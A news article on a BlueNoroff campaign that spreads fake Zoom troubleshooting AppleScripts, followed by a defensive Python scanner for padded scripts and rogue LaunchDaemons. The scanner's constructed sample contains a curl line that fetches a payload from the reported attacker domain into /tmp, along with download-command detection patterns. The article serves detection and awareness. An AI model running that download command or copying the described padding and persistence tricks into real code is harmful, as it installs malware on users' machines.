- Fake Zoom scripts launch malware hidden beneath thousands of lines of code and blank space
- A LaunchDaemon ensures the malware runs at startup with administrator rights once installed
- Malicious components are disguised as legitimate tools such as “icloud_helper” and “Wi-Fi Updater”
A new cyber campaign using fake Zoom applications is targeting organizations in North America, Europe and Asia-Pacific, experts have warned.
The campaign, linked to North Korean hackers, is attributed to the BlueNoroff group, a known affiliate of the infamous Lazarus Group, and spoofs Zoom's legitimate videoconferencing services to deceive unsuspecting victims.
Focused mainly on the gaming, entertainment and fintech sectors, the operation appears carefully coordinated and aims to compromise cryptocurrency wallets and other sensitive financial data.
How the attack works
The operation begins with a deceptive AppleScript designed to look as though it is performing routine Zoom SDK maintenance.
Analysts found the script padded with around 10,000 blank lines to hide the malicious commands buried deep inside it.
Those commands, located at lines 10,017 and 10,018, use curl to silently download malware from a spoofed domain: Zoom-Tech[.]us.
Once installed, the malware embeds itself in the system with LaunchDaemon settings that execute the malicious payload at startup with elevated privileges.
Additional components are then retrieved from the compromised infrastructure and disguised as normal macOS tools such as “icloud_helper” and “Wi-Fi Updater”.
These components wipe temporary files and staging folders, using anti-forensic methods to evade detection while maintaining backdoor access for remote commands and data theft.
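The two tell-tale traits described above, a script padded with thousands of blank lines before a download command and a LaunchDaemon that starts a binary from a staging location at boot, are easy to check for with a small heuristic scanner. The following is an added example written for this article, not code from the reporting or from any vendor tool; the sample script and plists are constructed to mimic the described structure, and the only value taken from the article is the reported domain in BLOCKED_DOMAINS.

```python
"""Heuristic checks for padded scripts and suspicious LaunchDaemon plists.

Added defender-side example; all sample data below is constructed.
"""
import plistlib
import re
from dataclasses import dataclass, field

# Domain reported in the campaign (from the article); extend with your own intel.
BLOCKED_DOMAINS = {"zoom-tech.us"}
DOWNLOAD_RE = re.compile(r"\b(curl|wget|nscurl)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# Locations an attacker can write to without root; a LaunchDaemon launching
# from here at boot is worth a look.
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/")


@dataclass
class ScriptFinding:
    total_lines: int
    longest_blank_run: int = 0
    download_lines: list = field(default_factory=list)   # line numbers with curl/wget
    downloads_after_padding: int = 0                     # of those, how many follow a long blank run
    blocked_domains: set = field(default_factory=set)

    @property
    def suspicious(self) -> bool:
        # A download command only reachable after a huge blank run is the padding
        # trick; a blocklisted domain is enough on its own.
        return bool(self.blocked_domains) or self.downloads_after_padding > 0


def scan_script(text: str, min_blank_run: int = 1000) -> ScriptFinding:
    """Walk the script once, tracking blank-line runs and download commands."""
    lines = text.splitlines()
    finding = ScriptFinding(total_lines=len(lines))
    run = 0
    seen_padding = False
    for line_no, line in enumerate(lines, start=1):
        if line.strip() == "":
            run += 1
            finding.longest_blank_run = max(finding.longest_blank_run, run)
            continue
        if run >= min_blank_run:
            seen_padding = True
        run = 0
        if DOWNLOAD_RE.search(line):
            finding.download_lines.append(line_no)
            if seen_padding:
                finding.downloads_after_padding += 1
        for host in URL_RE.findall(line):
            if host.lower() in BLOCKED_DOMAINS:
                finding.blocked_domains.add(host.lower())
    return finding


def scan_launchdaemon(plist_bytes: bytes) -> list:
    """Return human-readable reasons a LaunchDaemon plist looks suspicious."""
    reasons = []
    plist = plistlib.loads(plist_bytes)
    label = str(plist.get("Label", ""))
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    program = str(args[0]) if args else ""
    if plist.get("RunAtLoad") and program.startswith(STAGING_PREFIXES):
        reasons.append(f"RunAtLoad program in user-writable path: {program}")
    # Labels borrowing Apple/vendor-sounding names without the real reverse-DNS prefix
    if re.search(r"icloud|wi-?fi|zoom", label, re.IGNORECASE) and not label.startswith("com.apple."):
        reasons.append(f"Label mimics a system or vendor service: {label}")
    return reasons


# Constructed sample: a benign-looking header, 10,000 blank lines, then a download.
SAMPLE_SCRIPT = (
    "-- Zoom SDK maintenance\n"
    'display dialog "Checking Zoom SDK..."\n'
    + "\n" * 10000
    + 'do shell script "curl -s https://zoom-tech.us/update -o /tmp/icloud_helper"\n'
)
# Constructed plists: one mimicking the described persistence, one ordinary Apple daemon.
SAMPLE_PLIST = plistlib.dumps(
    {"Label": "com.icloud.helper", "ProgramArguments": ["/tmp/icloud_helper"], "RunAtLoad": True}
)
BENIGN_PLIST = plistlib.dumps(
    {"Label": "com.apple.softwareupdated", "ProgramArguments": ["/usr/libexec/softwareupdated"], "RunAtLoad": True}
)

if __name__ == "__main__":
    f = scan_script(SAMPLE_SCRIPT)
    print(f"lines={f.total_lines} longest_blank_run={f.longest_blank_run} "
          f"downloads={f.download_lines} blocked={f.blocked_domains} suspicious={f.suspicious}")
    print("daemon findings:", scan_launchdaemon(SAMPLE_PLIST))
    print("benign daemon findings:", scan_launchdaemon(BENIGN_PLIST))
```

On a real host, point scan_script at any .scpt/.applescript or shell file handed to users by "support", and feed scan_launchdaemon the contents of /Library/LaunchDaemons/*.plist; the thresholds are deliberately coarse and meant to surface candidates for review, not to replace endpoint protection.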
The method exploits the common work-from-home scenario in which technical problems are resolved quickly with minimal scrutiny.
The malware goes beyond simple credential theft. It actively hunts for cryptocurrency wallet extensions, browser sessions and authentication keys, confirming BlueNoroff's continued focus on financial gain.
In one documented case, a Canadian online gambling company was attacked on May 28, when the attackers used fake Zoom troubleshooting scripts to plant malware.
To stay safe, independently verify Zoom meeting participants, block suspicious domains and use endpoint protection, because attackers now exploit trusted and familiar workflows to bypass basic defenses.
It is also important to choose the best antivirus and ransomware protection software, especially for organizations with digital assets or crypto holdings.
Companies should adopt identity theft protection to monitor exposed data and credentials, train staff on social-engineering risks and secure cryptocurrency tools with hardware wallets.
Via Cybersecuritynews